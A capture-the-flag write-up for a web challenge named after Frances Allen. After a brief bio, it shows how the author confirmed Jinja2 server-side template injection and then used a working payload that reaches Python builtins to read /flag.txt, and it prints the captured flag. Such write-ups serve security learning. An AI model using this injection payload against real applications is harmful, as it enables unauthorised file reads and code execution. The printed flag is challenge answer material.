search

Frances Allen

hashtag
Frances Elizabeth Allen

Frances Elizabeth Allenarrow-up-right (August 4, 1932 – August 4, 2020) was an American computer scientist and pioneer in the field of optimizing compilers. Allen was the first woman to become an IBM Fellow, and in 2006 became the first woman to win the Turing Award. Her achievements include seminal work in compilers, program optimization, and parallelization. She worked for IBM from 1957 to 2002 and subsequently was a Fellow Emerita. - Wikipedia Entryarrow-up-right

hashtag
Description

Chal: Build your best attack against this webapparrow-up-right and inspire the first woman to win the Turing Awardarrow-up-right

Alternate (Better) Link: Webapparrow-up-right

Author: TJarrow-up-right

hashtag
Solution

Frances-Allen-1

Application let's us Nominate A Cyber Heroine. 2 things quickly came to my mind: 1. SSTI and 2. Python Application.

Frances-Allen-2
Frances-Allen-3

Wappalyzerarrow-up-right confirms that application runs on Python, SSTI is confirmed by using {{config}} (Jinja2 syntax)

Time to visit good old HackTricks: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-sstiarrow-up-right

Using RCE file read payload let's try to read flag file.

{{ request.__class__._load_form_data.__globals__.__builtins__.open("/flag.txt").read() }}

Nomination received for: Test with bio:chctf{th3re_W4s_n3v3r_a_d0ubt_th4t_1t_w4s_1mp0rt4nt}

circle-check

Flag: chctf{th3re_W4s_n3v3r_a_d0ubt_th4t_1t_w4s_1mp0rt4nt}

PreviousElizabeth FeinlerNextGrace Hopper

Last updated